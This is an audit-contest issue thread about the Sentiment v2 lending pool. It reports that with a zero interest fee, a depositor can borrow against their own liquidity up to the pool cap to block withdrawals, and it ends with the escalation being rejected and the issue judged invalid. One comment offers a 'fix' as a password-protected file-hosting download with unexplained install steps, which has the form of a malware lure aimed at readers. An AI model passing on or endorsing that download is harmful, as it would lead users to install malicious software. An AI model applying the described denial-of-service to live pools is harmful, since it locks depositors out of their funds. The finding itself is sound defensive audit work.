### ISSUE TITLE
Nihavent - If `Pool::defaultInterestFee` is 0, depositors can borrow against themselves to DOS pool withdrawals

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2024-08-sentiment-v2-judging#389]
Nihavent

Medium

# If `Pool::defaultInterestFee` is 0, depositors can borrow against themselves to DOS pool withdrawals

## Summary

Users must be able to trust the pool owner, but not other depositors in the same pool. But if the `defaultInterestFee` is set to 0, a borrower can borrow against their own capital up to the `poolCap` to DOS pool withdrawals for other users.

## Vulnerability Detail

According to the [readme](https://audits.sherlock.xyz/contests/349) `defaultInterestFee` has a range of permitted values from 0 to 10%. The `defaultInterestFee` represents the [`interestFee`](https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L585) that is set when a pool is initialized. 

The `interestFee` pool parameter is used to calculate how many `feeAssets` the `feeRecipient` should recieve, and in turn how many `feeShares` should be [minted to the `feeRecipient`](https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L385-L395). If set to 0, [no fees shares will be minted](https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L386). 

In this case, 100% of the `interestAccrued` is passed onto depositors because `pool.totalBorrowAssets` and `pool.totalDepositAssets` are incremented by the same value.

```javascript
    function accrue(PoolData storage pool, uint256 id) internal {
        (uint256 interestAccrued, uint256 feeShares) = simulateAccrue(pool);

        if (feeShares != 0) _mint(feeRecipient, id, feeShares);

        // update pool state
        pool.totalDepositShares += feeShares; // feeShares is 0 in this case
@>      pool.totalBorrowAssets += interestAccrued;
@>      pool.totalDepositAssets += interestAccrued;

        ... SKIP!...
    }
```

The issue is that a position controlled by a pool depositor can borrow against their own liquidity for free (no fees and interest paid by the attcker will be equal to interest earned). If they do this at the required volume to bring the pool to it's cap, it will block withdrawals for regular users. The amount available to with is [capped to the available liquidity in the pool](https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L359-L362).

To withdraw funds from the pool, regular users will need to wait for repayments to create available liquidty. However in the case of large depositors waiting to withdraw, upon repayments there will be a race conditions to withdraw.

Some other details that make this DOS attack viable:
- There is no deadline for positions to repay debt, consequenctly there is no deadline on how long a large pool deposit could be DOSed
- There is no minimum value that a `poolCap` can be set. Due to the permissionless nature of setting up a pool, there will be many pools where this attack is possible.
- The attacker will need to deposit extra collateral, this is small relative to the borrow size given they can swap the borrowed funds into an approved collateral asset, and the LTV can be set to as high as 98%
- The attacker's deposit into the pool is still capital efficient as they can utilize the borrowed funds in defi to earn yield through `exec()`.
- According the the contest readme, the planned `defaultOriginationFee` is 0 in the planned deployment

## Impact

- Pool withdrawals can be DOSed for free if the attacker has sufficient capital to reach the pool's cap.
- Race conditions will be created to withdraw when liquidity becomes available. Possible impacts of this are the pool shares trading at less than their potentially redeemable value.

## Code Snippet

https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L585
https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L380-L398
https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L401-L414
https://github.com/sherlock-audit/2024-08-sentiment-v2/blob/main/protocol-v2/src/Pool.sol#L359-L362

## Tool used

Manual Review

## Recommendation

- Only allow `defaultInterestFee` paramater to be set > 0 to ensure there is non-trivial costs for this attack.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Nihavent** [comment]
Escalate 

The judge noted that the attack path doesn't consider borrowing costs. The title of this issue predicates the report on the `defaultInterestFee` being 0 which is a valid parameter setting according to the contest readme. Under this setting the cost of the attack is 0 due to the interest earned equaling the interest paid when a user borrow's against their own liquidity.

**Comment by sherlock-admin3** [comment]
> Escalate 
> 
> The judge noted that the attack path doesn't consider borrowing costs. The title of this issue predicates the report on the `defaultInterestFee` being 0 which is a valid parameter setting according to the contest readme. Under this setting the cost of the attack is 0 due to the interest earned equaling the interest paid when a user borrow's against their own liquidity.
> 

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by cvetanovv** [comment]
The `poolCap` should be large enough that a user cannot reach it alone. 

Furthermore, the admin can call `setPoolCap` at any time and increase the pool cap.

```solidity
    function setPoolCap(uint256 poolId, uint128 poolCap) external {
        if (msg.sender != ownerOf[poolId]) revert Pool_OnlyPoolOwner(poolId, msg.sender);
 poolDataFor[poolId].poolCap = poolCap;
        emit PoolCapSet(poolId, poolCap);
 }
```

Planning to reject the escalation and leave the issue as is.

**Comment by Evert0x** [comment]
Result:
Invalid
Unique

**Comment by sherlock-admin4** [comment]
Escalations have been resolved successfully!

Escalation status:
- [Nihavent](https://github.com/sherlock-audit/2024-08-sentiment-v2-judging/issues/389/#issuecomment-2356584485): rejected
